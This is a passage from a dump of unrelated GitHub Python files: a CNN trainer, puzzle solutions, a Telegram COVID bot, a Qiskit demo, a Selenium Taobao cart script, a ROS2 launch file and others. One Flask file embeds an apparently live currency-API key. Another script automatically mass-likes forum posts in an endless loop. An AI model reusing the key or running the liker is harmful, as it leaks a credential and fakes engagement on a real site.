2, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n nn.Conv2d(128, 256, 2, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n nn.Conv2d(256, 512, 2, padding=1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=1),\n nn.Dropout(0.3),\n nn.Conv2d(512, 256, 2, padding=1),\n nn.BatchNorm2d(256),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n nn.Dropout(0.3),\n nn.Conv2d(256, 128, 2, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n nn.Conv2d(128, 64, 2, padding=0),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=1),\n torch.nn.Flatten(),\n nn.Linear(64, 1000, bias = True),\n nn.Dropout(0.5),\n nn.Linear(1000, 3, bias = True),\n )\n \n soft = nn.Softmax(dim=1)\n \n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(\"Current device:\", device)\n \n model.to(device)\n \n # Define the loss\n criterion = nn.CrossEntropyLoss().to(device)\n \n # Define the optimizer\n optim = torch.optim.SGD(model.parameters(), lr = 0.01) # 0.01\n \n best_epoch = 0\n accuracy_save = np.array(0)\n for epoch in range(args.epochs):\n\n model.train()\n train_loss = []\n correct_train = 0\n correct_val = 0\n correct_batch = 0\n s = time.time()\n\n for batch, data in enumerate(loader_train, 1):\n label = data['label'].to(device)\n input = data['input'].to(device)\n\n output = model(input)\n label_pred = soft(output).argmax(1)\n \n optim.zero_grad()\n \n loss = criterion(output, label)\n loss.backward()\n \n optim.step()\n \n correct_train += (label == label_pred).float().sum()\n \n train_loss += [loss.item()]\n\n accuracy_train = correct_train / num_train\n \n correct_val = 0\n accuracy_tmp = np.array(0)\n with torch.no_grad():\n\n model.eval() \n val_loss = []\n v = time.time()\n\n for batch, data in enumerate(loader_val, 1):\n\n label_val = data['label'].to(device)\n input_val = data['input'].to(device)\n \n output_val = model(input_val)\n \n label_val_pred = soft(output_val).argmax(1)\n \n correct_val += (label_val == label_val_pred).float().sum()\n \n loss = criterion(output_val, label_val)\n val_loss += [loss.item()]\n \n end = time.time()\n accuracy_val = correct_val / num_val\n \n # Save the best model wrt val accuracy\n accuracy_tmp = accuracy_val.cpu().numpy()\n if accuracy_save < accuracy_tmp:\n best_epoch = epoch+1\n accuracy_save = accuracy_tmp.copy()\n torch.save(model.state_dict(), 'param.data')\n print(\".......model updated (epoch = \", epoch+1, \")\")\n \n print(\"epoch: %04d / %04d | train loss: %.5f | train accuracy: %.4f | validation loss: %.5f | validation accuracy: %.4f | time: %.2f seconds | validation: %.2f seconds\" %\n (epoch+1, args.epochs, np.mean(train_loss), accuracy_train, np.mean(val_loss), accuracy_val, time.time() - s, end - v))\n \n print(\"Model with the best validation accuracy is saved.\")\n print(\"Best epoch: \", best_epoch)\n print(\"Best validation accuracy: \", accuracy_save)\n print(\"Done.\")\n \n","repo_name":"jooeunkiim/spds-rps","sub_path":"Task3/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"24061014740","text":"def maxArea(height):\n if len(height) <= 1:\n return 0\n\n left_cursor = 0\n right_cursor = len(height) - 1\n max_area = 0\n\n while left_cursor != right_cursor:\n area = min(height[left_cursor], height[right_cursor]) * (right_cursor - left_cursor)\n if area > max_area:\n max_area = area\n\n if height[left_cursor] < height[right_cursor]:\n left_cursor += 1\n else:\n right_cursor -= 1\n\n return max_area\n\nprint(f\"maxArea([1, 8, 6, 2, 5, 4, 8, 3, 7]): correct: {maxArea([1, 8, 6, 2, 5, 4, 8, 3, 7]) == 49}\")\n","repo_name":"DaMinaup6/algorithm-exercises","sub_path":"leetcode/medium/11_contains_with_most_water.py","file_name":"11_contains_with_most_water.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"12467695697","text":"# def return_original(arr):\r\n# \tfor i in range(len(arr)):\r\n# \t\tif arr[i]*2 in arr:\r\n# \t\t\treturn arr[:(arr[i]*2)+1]\r\n# \t\telse:\r\n# \t\t\treturn -1\r\nfrom collections import Counter\r\nclass Solution:\r\n def findOriginalArray(self, changed):\r\n if len(changed) % 2 == 1:\r\n return []\r\n data = Counter(changed)\r\n result = []\r\n for k in sorted(data):\r\n if data[k] < 0:\r\n return []\r\n value = k * 2\r\n while data[k] > 0:\r\n if data[value] == 0:\r\n return []\r\n result.append(k)\r\n data[k] -= 1\r\n data[value] -= 1\r\n return result\r\n\r\narr = [1, 3, 4, 5, 6, 2, 6, 8, 10, 12]\r\nsol = Solution()\r\nprint(sol.findOriginalArray(arr))","repo_name":"Parvez13/Placement_Assignment-Sohail_Parvez-","sub_path":"Pre_Placement/Assignment/Arrays2D_Lecture_3/question_6.py","file_name":"question_6.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"75021664373","text":"from AoC2021.day_15 import navigate_cave, navigate_giga_cave\nfrom AoC2021.util import parse_chiton_cave\n\n\ndef main():\n print('Welcome to Day 15 of Advent of Code 2021')\n\n cave, row_len = parse_chiton_cave('./data/day_15.txt')\n\n risk_level = navigate_cave(cave, row_len)\n\n print(f'Risk Level: {risk_level!r}')\n\n giga_risk = navigate_giga_cave(cave, row_len)\n\n print(f'Giga Risk: {giga_risk!r}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"alyons/aoc_python","sub_path":"main_15.py","file_name":"main_15.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"23923453436","text":"from bs4 import BeautifulSoup\nimport time\nimport requests\nimport logging\n\n\nclass HfBoards:\n BASE = 'https://hfboards.mandatory.com'\n logged_in = False\n\n def __init__(self, username, password):\n \"\"\"Creates a HFboards Requests session and logs supplied username in\n\n Parameters\n ----------\n username : str\n Hfboards username\n password : str\n Hfboards password\n \"\"\"\n self.hf_session = requests.Session()\n resp = self.hf_session.get(self.BASE)\n\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}\n payload = {\"login\": username,\n \"register\": \"0\",\n \"password\": password,\n \"remember\": \"1\",\n \"cookie_check\": \"1\",\n \"redirect\": \"/\"}\n\n resp = self.hf_session.post(self.BASE + '/login/login', data=payload, headers=headers, stream=False)\n\n self.visited_threads = set()\n if self.__is_good_response(resp):\n # print(requests.utils.dict_from_cookiejar(self.hf_session.cookies))\n soup = BeautifulSoup(resp.content, \"html.parser\")\n self.logout_url = soup.find('a', {'class': 'LogOut'})['href']\n self.logged_in = True\n\n def logout(self):\n \"\"\"Ends current HfBoards session by logging out\n \"\"\"\n if self.logged_in:\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}\n\n resp = self.hf_session.get(self.BASE + '/' + self.logout_url, headers=headers)\n\n self.hf_session.close()\n\n def __is_good_response(self, resp):\n \"\"\"\n Determines is the Requests response was valid\n\n Parameters\n ----------\n resp : Response Object\n\n Returns\n ----------\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code in [200]\n and content_type is not None\n and content_type.find('html') > -1)\n\n def __like_posts(self, xf_token, thread_url, posts):\n \"\"\"Likes posts within a thread page\n\n Parameters\n ----------\n xf_token : str\n xenforo token hidden in page\n thread_url : str\n url of the thread to like\n posts : bs4.element.Tag\n Beautiful Soup Tags containing urls of post to like on a page\n \"\"\"\n if self.logged_in:\n\n cookies = requests.utils.dict_from_cookiejar(self.hf_session.cookies)\n\n cookie_header = ''\n\n for key, value in cookies.items():\n cookie_header += \"=\".join([key, value]) + ';'\n\n headers = {\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',\n 'cookie': cookie_header,\n 'dnt': '1',\n 'origin': 'https://hfboards.mandatory.com',\n 'referer': thread_url,\n 'x-ajax-referer': thread_url,\n 'x-requested-with': 'XMLHttpRequest',\n }\n\n payload = {\"_xfNoRedirect\": '1',\n \"_xfToken\": xf_token,\n \"_xfResponseType\": 'json',\n \"_xfRequestUri\": thread_url,\n }\n\n for count, like in enumerate(posts):\n url = self.BASE + '/' + like['href']\n logger.info(\"Liking post: \" + url)\n resp = self.hf_session.post(url=url, data=payload, headers=headers)\n time.sleep(2)\n\n def like_thread(self, thread_id, live):\n \"\"\"Iterates over pages in a thread and gathers all posts to like.\n calls __like_posts for each thread page\n Parameters\n ----------\n thread_id : str\n ex. threads/chad-larose.1474771/\n live : bool\n Is this a live thread? [True/False]\n \"\"\"\n if self.logged_in:\n # threads are in the form https://hfboards.mandatory.com/threads/thread-id\n url = '/'.join([self.BASE, thread_id])\n resp = self.hf_session.get(url)\n\n if self.__is_good_response(resp):\n\n soup = BeautifulSoup(resp.content, \"html.parser\")\n\n nav = soup.find('div', {'class': 'PageNav'})\n\n xf_token = soup.find(name='input', attrs={'name': '_xfToken'})['value']\n\n posts = soup.find_all('a', {'class': 'LikeLink item control like'})\n\n logger.info('Liking Page: ' + url)\n self.__like_posts(xf_token, url, posts)\n\n try:\n if nav is not None:\n thread_pages = int(nav['data-last'])\n curr_page = int(nav['data-page'])\n\n if curr_page and curr_page != thread_pages:\n url_lst = url.split('/')\n\n if url_lst[-1] == 'unread':\n url = '/'.join(url_lst[:-1])\n\n for pg_num in range(curr_page + 1, thread_pages + 1):\n time.sleep(2)\n\n if live:\n page_url = url + '?page=' + str(pg_num)\n else:\n page_url = url + '/page-' + str(pg_num)\n\n resp = self.hf_session.get(page_url)\n\n soup = BeautifulSoup(resp.content, \"html.parser\")\n\n logger.info(\"Liking Page: \" + page_url)\n\n xf_token = soup.find(name='input', attrs={'name': '_xfToken'})['value']\n\n posts = soup.find_all('a', {'class': 'LikeLink item control like'})\n\n self.__like_posts(xf_token, page_url, posts)\n\n except KeyError:\n pass # sometimes a nav won't exist or be completely populated, ok to ignore... ie keyerror data-last\n\n def like_forum(self, forum, num_threads):\n \"\"\" Likes all posts in num_threads of most recently posted threads (excluding stickied)\n\n Parameters\n ----------\n fourm : str\n HfBoards Fourm Id\n ex: carolina-hurricanes.26\n num_threads : int\n Number of threads to like within forum\n \"\"\"\n if self.logged_in:\n\n resp = self.hf_session.get(self.BASE + '/forums/' + forum)\n\n if self.__is_good_response(resp):\n soup = BeautifulSoup(resp.content, \"html.parser\")\n\n threads = soup.find_all('a', {'class': 'PreviewTooltip'})\n\n # only want threads that aren't stickied\n threads = [item['href'] for item in threads if not item.find_parents(\"li\", class_='sticky')]\n\n for thread in threads[:num_threads]:\n\n # We want to make sure we have looped through each thread page once before checking for new posts\n # strip off /unread from the url and only add it back once it is a part of our set.\n if thread[-1] == '/':\n thread = thread[:-1]\n if thread[-6:] == 'unread':\n thread = thread[:-7]\n\n if thread in self.visited_threads:\n thread = thread + '/unread'\n else:\n self.visited_threads.add(thread)\n\n if thread[-4:] == 'live':\n self.like_thread(thread, True)\n else:\n self.like_thread(thread, False)\n\n time.sleep(10)\n\nif __name__ == \"__main__\":\n\n logging.basicConfig(filename='ilikeyou.log', format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.DEBUG)\n logger = logging.getLogger(__name__)\n\n conn = HfBoards('username', 'password')\n\n while True:\n logger.info('liking some threads...')\n conn.like_forum('carolina-hurricanes.26', 5)\n logger.info('going to sleep for a bit...')\n time.sleep(240)\n\n\n # like a specific thread\n # conn.like_thread('threads/gdt-edmonton-carolina-6-19-stanley-cup-finals-game-7.260815', False)\n\n conn.logout()\n","repo_name":"Identity404/ILikeHFCanes","sub_path":"HFBoards.py","file_name":"HFBoards.py","file_ext":"py","file_size_in_byte":8636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"21850867700","text":"import pytesseract\nimport cv2\nimport numpy as np\nimport imutils\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\ndigit_prediction = tf.keras.models.load_model('model/final_model')\ndigit_prediction.summary()\n\n\ndef detect(image):\n nh = image.shape[0]\n nw = image.shape[1]\n cell = image[int(nh / 20):int(19 * nh / 20), int(nw / 20): int(19 * nw / 20)]\n gray = cv2.cvtColor(cell, cv2.COLOR_BGR2GRAY)\n gray[np.where(gray >= 150)] = 255\n gray[np.where(gray < 150)] = 0\n gray = cv2.resize(gray, (28, 28))\n gray[np.where(gray >= 200)] = 255\n gray[np.where(gray < 200)] = 0\n gray = cv2.bitwise_not(gray)\n if (np.sum(gray) == 0):\n return 0\n return np.argmax(digit_prediction.predict(tf.reshape(gray, [-1, 28, 28, 1])))\n\n\n\n","repo_name":"srikantv03/sudoku-solver","sub_path":"src/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"11352327547","text":"#let’s rename name to movie_title.\n\n#Use the keyword inplace=True so that you modify df rather than creating a new DataFrame!\n\nimport codecademylib\nimport pandas as pd\n\ndf = pd.read_csv('imdb.csv')\n\n# Rename columns here\ndf.rename(columns={\n'name': 'movie_title' \n},\ninplace = 'True'\n)\nprint(df)\n","repo_name":"Arif-Badhon/Code-Academy","sub_path":"Code-Academy/Data Science Path/Data Manupulation with Pandas/RenameingColumn.py","file_name":"RenameingColumn.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"290159849","text":"from odoo import api, fields, models\n\n\nclass ProductPackLine(models.Model):\n _name = 'product.pack.line'\n # 1º Historia de usuario\n pack_id = fields.Many2one(\n comodel_name='product.product',\n string=\"Pack\",\n )\n component_id = fields.Many2one(\n comodel_name='product.product',\n string=\"Component\",\n required=True,\n )\n quantity = fields.Integer(\n string=\"Quantity\",\n )\n price = fields.Float(\n string=\"Price\",\n )\n\n @api.onchange('component_id')\n def onchange_component_id(self):\n self.price = self.component_id.list_price\n","repo_name":"QubiQ/sistema-doq","sub_path":"practica_final_2/models/product_pack_line.py","file_name":"product_pack_line.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"32789760862","text":"import os\nimport shutil\nfrom datetime import datetime\n\nimport requests\nfrom covid import Covid\nfrom pyrogram import Filters, InlineKeyboardButton, InlineKeyboardMarkup\n\nfrom covidinfo import setbot\n\n\n@setbot.on_message(Filters.command(\"corona\") | Filters.command(\"corona@coronainfo19bot\"))\nasync def corona(client, message):\n args = message.text.split(None, 1)\n if len(args) == 1:\n await message.reply(\"`usage: /corona (country)`\")\n return\n covid = Covid()\n data = covid.get_data()\n country = args[1]\n country_data = get_country_data(country.capitalize(), data)\n if country_data:\n output_text = \"`Confirmed : {}\\n`\".format(country_data[\"confirmed\"])\n output_text += \"`Active : {}`\\n\".format(country_data[\"active\"])\n output_text += \"`Deaths : {}`\\n\".format(country_data[\"deaths\"])\n output_text += \"`Recovered : {}`\\n\".format(country_data[\"recovered\"])\n output_text += \"`Last update : {}`\\n\". \\\n format(datetime.utcfromtimestamp(country_data[\"last_update\"] // 1000).strftime('%Y-%m-%d %H:%M:%S'))\n output_text += \"`Data provided by `Johns Hopkins University\"\n else:\n output_text = \"`No information yet about this country!`\"\n await message.reply(\"**Corona Virus Info in {}**:\\n\\n{}\".format(country.capitalize(), output_text))\n\n\ndef get_country_data(country, world):\n for country_data in world:\n if country_data[\"country\"] == country:\n return country_data\n return\n\n\n@setbot.on_message(Filters.command(\"coronastats\") | Filters.command(\"coronastats@coronainfo19bot\"))\nasync def coronastats(client, message):\n url = 'https://covid-19-api-2-i54peomv2.now.sh/api/og'\n response = requests.get(url, stream=True)\n with open('og', 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)\n del response\n os.rename(\"og\", \"og.png\")\n await client.send_photo(message.chat.id, \"og.png\", caption=\"Source\")\n os.remove(\"og.png\")\n\n\n@setbot.on_message(Filters.command(\"start\") | Filters.command(\"start@coronainfo19bot\"))\nasync def start(client, message):\n list_button = InlineKeyboardMarkup([[InlineKeyboardButton(\"Add me to your group\", url=\"https://t.me\"\n \"/coronainfo19bot?startgroup=new\")],\n [InlineKeyboardButton(\"Support Group\", url=\"https://t.me/nanabotsupport\"),\n InlineKeyboardButton(\"Help\", callback_data=\"help\")]])\n await client.send_message(message.chat.id, \"Hey there! I'm here can give you information about Covid-19 Cases!\\n\"\n \"click /help to see what can i do\\n\\n\"\n \"you can also add this bot to your group for getting data about covid-19\\n\"\n \"Join to our group @nanabotsupport if you need help / problem with this bot\\n\\n\"\n \"this bot made by @legenhand\", reply_markup=list_button)\n\n\ndef dynamic_data_filter(data):\n return Filters.create(\n lambda flt, query: flt.data == query.data,\n data=data # \"data\" kwarg is accessed with \"flt.data\" above\n )\n\n\n@setbot.on_callback_query(dynamic_data_filter(\"help\"))\nasync def tulung(client, message):\n helptext = \"\"\"\nCheck info of cases corona virus disease 2019\n\n──「 **Info Covid** 」──\n-> `/corona (country)`\n\n──「 **get graph stats of global cases** 」──\n-> `/coronastats`\n\"\"\"\n await message.message.edit(helptext)\n\n\n@setbot.on_message(Filters.command(\"help\") | Filters.command(\"help@coronainfo19bot\"))\nasync def helpcommand(client, message):\n helptext = \"\"\"\n Check info of cases corona virus disease 2019\n\n ──「 **Info Covid** 」──\n -> `/corona (country)`\n\n ──「 **get graph stats of global cases** 」──\n -> `/coronastats`\n \"\"\"\n await message.reply(helptext)\n","repo_name":"legenhand/covid-bot","sub_path":"covidinfo/assistant/corona_virus.py","file_name":"corona_virus.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16042915602","text":"def fact(num):\n \"\"\"\n Input: An integer num >= 0\n Output: Factorial value \n \"\"\"\n if num <= 1:\n return 1\n else:\n return num * fact(num-1)\n\nfor idx in range(0, 11):\n print(\"Current input: \" + str(idx))\n print(\"Factorial value: \" + str(fact(idx)))\n print(\"---------------------------------\")\n\n","repo_name":"ashutoshpurushottam/Algorithms","sub_path":"1-Grokking/03-Recursion/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11090211436","text":"from qiskit import QuantumCircuit, ClassicalRegister, QuantumRegister\nfrom qiskit import available_backends, execute\n\n# Create a Quantum Register and classical registers with 2 qubits and 2 classical bits.\nq = QuantumRegister(2)\nc = ClassicalRegister(2)\nqc = QuantumCircuit(q, c)\n\n # Add a H gate on qubit 0 to create a superposition\nqc.h(q[0])\n# Add a controlled not (CX) with qubit 0 as control and qubit 1 target\nqc.cx(q[0], q[1])\n\n# Perform a unitary transformation to obtain one of the other three bell states\n# if we want to send 0 then we don't do anything as we are already in the bell computational basis\n# if we want to send 1 then perform a X transformation\n# if we want to send 2 then perform a Z transformation\n# if we want to send 3 then perform a XZ transformation\n\nqc.x(q[0]) \n# qc.z(q[0]) \n# qc.x(q[0])\n# qc.z(q[0])\n\n# To obtain the encoded value reapply the CX and H transformations followed by a measurement\n# This enables us to uncover the value by detecting which bell state we are in\nqc.cx(q[0], q[1])\nqc.h(q[0])\n\n# Add a Measure gate to see the state.\nqc.measure(q, c)\n\n# Compile and run the Quantum circuit on a simulator backend\njob_sim = execute(qc, \"local_qasm_simulator\")\nsim_result = job_sim.result()\nprint(sim_result.get_counts(qc))","repo_name":"stevenatkin/quantum","sub_path":"superdense.py","file_name":"superdense.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"34958387662","text":"import time, re\nfrom lxml import etree\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom flask import current_app\n\n\ndef add_taobao_cart(cart_list, cookie):\n '''\n 加入淘宝购物车\n '''\n driver = webdriver.Chrome()\n # options = webdriver.ChromeOptions()\n # options.add_argument('--headless')\n # driver = webdriver.Chrome(chrome_options=options)\n driver.maximize_window()\n wait = WebDriverWait(driver, 30)\n\n driver.get('https://www.taobao.com/')\n for key in cookie: # 添加cookie\n driver.add_cookie({\n 'domain': '.taobao.com',\n 'name': key,\n 'value': cookie[key],\n 'path': '/'\n })\n\n for item in cart_list: # 逐个加入购物车\n goods_url, goods_sku1, goods_sku2, quantity = item['goods_url'], item['goods_sku1'], item['goods_sku2'], item['quantity']\n driver.get(goods_url)\n wait.until(EC.presence_of_element_located((By.XPATH, '//*[contains(@id, \"Stock\")]')))\n html = driver.page_source\n doc = etree.HTML(html)\n goods_sku = [goods_sku1, goods_sku2]\n for item in goods_sku:\n if item:\n data_property = re.split(r':', item)[0]\n sku = re.split(r':', item)[1]\n if len(doc.xpath('//ul[@data-property=\"{}\"]/li'.format(data_property))) != 1: # 商品属性只有1个时,已自动选中\n try:\n sku_matched = wait.until(\n EC.element_to_be_clickable((By.XPATH, '//ul[@data-property=\"{0}\"]/li//span[text()=\"{1}\"]/..'.format(data_property, sku))))\n sku_matched.send_keys(Keys.ENTER)\n time.sleep(0.2)\n except:\n current_app.logger.error('无法选中属性', exc_info=True)\n try:\n input = wait.until(\n EC.presence_of_element_located((By.XPATH, '//*[contains(@class, \"tb-amount\")]//input')))\n input.send_keys(Keys.BACK_SPACE)\n input.send_keys(quantity)\n time.sleep(0.3)\n except:\n current_app.logger.error('无法输入数量', exc_info=True)\n try:\n submit = wait.until(\n EC.element_to_be_clickable((By.XPATH, '//div[contains(@class, \"tb-action\")]/div[2]/a')))\n submit.send_keys(Keys.ENTER)\n time.sleep(0.2)\n except:\n current_app.logger.error('无法加入购物车', exc_info=True)\n time.sleep(0.5)\n\n # 跳转至购物车,查询购物车状态\n driver.get('https://cart.taobao.com/')\n wait.until(EC.presence_of_element_located((By.XPATH, '//div[@id=\"J_OrderList\"]')))\n html = driver.page_source\n driver.quit()\n doc = etree.HTML(html)\n order_items = doc.xpath('//div[@id=\"J_OrderList\"]/div')\n order_cart_list = []\n for item in order_items:\n goods_title = item.xpath('.//div[@class=\"item-basic-info\"]/a/text()')[0]\n goods_price = item.xpath('.//em[@class=\"J_Price price-now\"]/text()')[0]\n quantity = item.xpath('.//div[@class=\"item-amount \"]/input/@data-now')[0]\n order_cart_list.append({'goodsTitle': goods_title, 'goodsPrice': goods_price, 'quantity': quantity})\n\n return order_cart_list\n\n","repo_name":"DavidLin3/order_cart","sub_path":"app/add_taobao_cart.py","file_name":"add_taobao_cart.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27171246543","text":"from flask import Flask,request,jsonify\r\nimport requests\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/',methods=['POST'])\r\ndef index():\r\n data = request.get_json()\r\n source_currency = data['queryResult']['parameters']['unit-currency']['currency']\r\n amount = data['queryResult']['parameters']['unit-currency']['amount']\r\n target_currency = data['queryResult']['parameters']['currency-name']\r\n\r\n\r\n cf = fetch_conversion_factor(source_currency,target_currency)\r\n final_amount = amount * cf\r\n final_amount = round(final_amount,2)\r\n response = {\r\n 'fulfillmentText': \"{} {} is {} {}\".format(amount,source_currency,final_amount,target_currency)\r\n }\r\n return jsonify(response)\r\n\r\ndef fetch_conversion_factor(source,target):\r\n url = \"https://api.freecurrencyapi.com/v1/latest?apikey=fca_live_oBmJBO9usRezGVW6rMvKTj0hDXe668HXeXcof7xX¤cies={}&base_currency={}\".format(target,source)\r\n response = requests.get(url)\r\n response = response.json()\r\n return response['data']['{}'.format(target)]\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","repo_name":"gvamsi-10/currency_converter","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11339345609","text":"from typing import List\n\nfrom launch import LaunchContext, LaunchDescription, LaunchDescriptionEntity\nfrom launch.actions import DeclareLaunchArgument, OpaqueFunction, RegisterEventHandler\nfrom launch.conditions import IfCondition\nfrom launch.event_handlers import OnProcessExit, OnProcessStart\nfrom launch.substitutions import (\n AndSubstitution,\n LaunchConfiguration,\n NotSubstitution,\n PathJoinSubstitution,\n)\n\nfrom lbr_bringup import LBRMoveGroupMixin\nfrom lbr_description import LBRDescriptionMixin, RVizMixin\nfrom lbr_ros2_control import LBRROS2ControlMixin\n\n\ndef launch_setup(context: LaunchContext) -> List[LaunchDescriptionEntity]:\n ld = LaunchDescription()\n\n robot_description = LBRDescriptionMixin.param_robot_description(sim=False)\n ros2_control_node = LBRROS2ControlMixin.node_ros2_control(\n robot_description=robot_description\n )\n ld.add_action(ros2_control_node)\n\n # joint state broad caster and controller on ros2 control node start\n joint_state_broadcaster = LBRROS2ControlMixin.node_controller_spawner(\n controller=\"joint_state_broadcaster\"\n )\n force_torque_broadcaster = LBRROS2ControlMixin.node_controller_spawner(\n controller=\"force_torque_broadcaster\"\n )\n lbr_state_broadcaster = LBRROS2ControlMixin.node_controller_spawner(\n controller=\"lbr_state_broadcaster\"\n )\n controller = LBRROS2ControlMixin.node_controller_spawner(\n controller=LaunchConfiguration(\"ctrl\")\n )\n\n controller_event_handler = RegisterEventHandler(\n OnProcessStart(\n target_action=ros2_control_node,\n on_start=[\n joint_state_broadcaster,\n force_torque_broadcaster,\n lbr_state_broadcaster,\n controller,\n ],\n )\n )\n ld.add_action(controller_event_handler)\n\n # robot state publisher on joint state broadcaster spawn exit\n robot_state_publisher = LBRROS2ControlMixin.node_robot_state_publisher(\n robot_description=robot_description, use_sim_time=False\n )\n robot_state_publisher_event_handler = RegisterEventHandler(\n OnProcessExit(\n target_action=joint_state_broadcaster, on_exit=[robot_state_publisher]\n )\n )\n ld.add_action(robot_state_publisher_event_handler)\n\n # MoveIt 2\n ld.add_action(LBRMoveGroupMixin.arg_allow_trajectory_execution())\n ld.add_action(LBRMoveGroupMixin.arg_capabilities())\n ld.add_action(LBRMoveGroupMixin.arg_disable_capabilities())\n ld.add_action(LBRMoveGroupMixin.arg_monitor_dynamics())\n ld.add_action(LBRMoveGroupMixin.args_publish_monitored_planning_scene())\n\n # MoveGroup:\n # - requires world frame\n # - urdf only has robot_name/world\n # This transform needs publishing\n robot_name = LaunchConfiguration(\"robot_name\").perform(context)\n ld.add_action(\n LBRDescriptionMixin.node_static_tf(\n tf=[0, 0, 0, 0, 0, 0], # keep zero\n parent=\"world\",\n child=PathJoinSubstitution(\n [\n robot_name,\n \"world\",\n ] # results in robot_name/world\n ),\n )\n )\n\n model = LaunchConfiguration(\"model\").perform(context)\n moveit_configs_builder = LBRMoveGroupMixin.moveit_configs_builder(\n robot_name=model,\n package_name=f\"{model}_moveit_config\",\n )\n movegroup_params = LBRMoveGroupMixin.params_move_group()\n\n ld.add_action(\n LBRMoveGroupMixin.node_move_group(\n parameters=[\n moveit_configs_builder.to_dict(),\n movegroup_params,\n {\"use_sim_time\": False},\n ],\n condition=IfCondition(LaunchConfiguration(\"moveit\")),\n namespace=robot_name,\n )\n )\n\n # RViz and MoveIt\n rviz_moveit = RVizMixin.node_rviz(\n rviz_config_pkg=f\"{model}_moveit_config\",\n rviz_config=\"config/moveit.rviz\",\n parameters=LBRMoveGroupMixin.params_rviz(\n moveit_configs=moveit_configs_builder.to_moveit_configs()\n ),\n condition=IfCondition(\n AndSubstitution(LaunchConfiguration(\"moveit\"), LaunchConfiguration(\"rviz\"))\n ),\n remappings=[\n (\"robot_description\", robot_name + \"/robot_description\"),\n (\"robot_description_semantic\", robot_name + \"/robot_description_semantic\"),\n (\"display_planned_path\", robot_name + \"/display_planned_path\"),\n (\"monitored_planning_scene\", robot_name + \"/monitored_planning_scene\"),\n ],\n )\n\n # RViz no MoveIt\n rviz = RVizMixin.node_rviz(\n rviz_config_pkg=\"lbr_bringup\",\n rviz_config=\"config/config.rviz\",\n condition=IfCondition(\n AndSubstitution(\n LaunchConfiguration(\"rviz\"),\n NotSubstitution(LaunchConfiguration(\"moveit\")),\n )\n ),\n )\n\n # RViz event handler\n rviz_event_handler = RegisterEventHandler(\n OnProcessStart(\n target_action=robot_state_publisher, on_start=[rviz_moveit, rviz]\n )\n )\n ld.add_action(rviz_event_handler)\n\n return ld.entities\n\n\ndef generate_launch_description() -> LaunchDescription:\n ld = LaunchDescription()\n ld.add_action(LBRDescriptionMixin.arg_model())\n ld.add_action(LBRDescriptionMixin.arg_robot_name())\n ld.add_action(LBRDescriptionMixin.arg_port_id())\n ld.add_action(\n DeclareLaunchArgument(\n name=\"moveit\",\n default_value=\"false\",\n description=\"Whether to launch MoveIt 2.\",\n )\n )\n ld.add_action(\n DeclareLaunchArgument(\n name=\"rviz\", default_value=\"true\", description=\"Whether to launch RViz.\"\n )\n )\n ld.add_action(LBRROS2ControlMixin.arg_ctrl_cfg_pkg())\n 